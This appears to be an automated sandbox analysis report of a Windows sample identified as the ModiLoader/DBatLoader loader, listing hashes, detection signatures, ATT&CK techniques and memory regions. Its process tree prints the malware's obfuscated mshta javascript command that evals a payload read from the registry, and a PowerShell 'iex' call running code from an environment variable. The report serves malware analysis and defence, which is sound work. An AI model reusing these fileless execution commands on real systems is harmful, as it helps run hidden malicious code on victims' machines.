Analysis

  • max time kernel
    142s
  • max time network
    105s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 02:00

General

  • Target

    3d79d2b7c859dd55bfcfb13eaad284d9_JaffaCakes118.exe

  • Size

    452KB

  • MD5

    3d79d2b7c859dd55bfcfb13eaad284d9

  • SHA1

    4ee02d0b2d15f2151a035471bf61633b5441d77a

  • SHA256

    3cc99effad03638d44d9ecf82f75cbd6bc95f00d62bf5cd506f409eca5f31661

  • SHA512

    f94995157c6e851c7c8e8a91b961c4f800e247b34189f397e3f4837434f8f73cab07aa5b7d49958d5a729f98b5517ca4651967e5d725ebe2e624364f9f76fb5e

  • SSDEEP

    6144:kVxKUv7oHoSIXCVjajY2gAdQyC10ZPleXMSgy9NNHVXEuar5nTm21DdFqS0XrKxU:kuUvmoSIQjirb6/geAna21DdFbxcd

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3d79d2b7c859dd55bfcfb13eaad284d9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3d79d2b7c859dd55bfcfb13eaad284d9_JaffaCakes118.exe"
    1⤵
      PID:2684
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:Ak7iCqet0r="8A3Jsv";qM9=new%20ActiveXObject("WScript.Shell");s4XiGdLC4="mSyvj";O6Lkr=qM9.RegRead("HKLM\\software\\Wow6432Node\\2USL5YLy1\\aXVyCtY");gmtXZy4="W2TzImM0y";eval(O6Lkr);lTtz1VQdj="O27CLXUxi";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:sznbam
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1336

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hxskowuv.2vs.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1336-12-0x0000000002440000-0x0000000002476000-memory.dmp
      Filesize

      216KB

    • memory/1336-16-0x0000000005620000-0x0000000005686000-memory.dmp
      Filesize

      408KB

    • memory/1336-14-0x0000000004DD0000-0x0000000004DF2000-memory.dmp
      Filesize

      136KB

    • memory/1336-13-0x0000000004F80000-0x00000000055A8000-memory.dmp
      Filesize

      6.2MB

    • memory/1336-31-0x0000000006C20000-0x0000000006C3A000-memory.dmp
      Filesize

      104KB

    • memory/1336-29-0x00000000073A0000-0x0000000007A1A000-memory.dmp
      Filesize

      6.5MB

    • memory/1336-28-0x0000000005BA0000-0x0000000005BEC000-memory.dmp
      Filesize

      304KB

    • memory/1336-27-0x0000000005B60000-0x0000000005B7E000-memory.dmp
      Filesize

      120KB

    • memory/1336-15-0x00000000055B0000-0x0000000005616000-memory.dmp
      Filesize

      408KB

    • memory/1336-26-0x0000000005690000-0x00000000059E4000-memory.dmp
      Filesize

      3.3MB

    • memory/2684-5-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB

    • memory/2684-3-0x0000000000400000-0x0000000000477000-memory.dmp
      Filesize

      476KB

    • memory/2684-10-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB

    • memory/2684-32-0x0000000006700000-0x0000000006701000-memory.dmp
      Filesize

      4KB

    • memory/2684-1-0x0000000006700000-0x0000000006701000-memory.dmp
      Filesize

      4KB

    • memory/2684-0-0x0000000002810000-0x00000000028A9000-memory.dmp
      Filesize

      612KB

    • memory/2684-6-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB

    • memory/2684-2-0x0000000002810000-0x00000000028A9000-memory.dmp
      Filesize

      612KB

    • memory/2684-7-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB

    • memory/2684-30-0x0000000000400000-0x0000000000477000-memory.dmp
      Filesize

      476KB

    • memory/2684-8-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB

    • memory/2684-9-0x0000000000690000-0x0000000000750000-memory.dmp
      Filesize

      768KB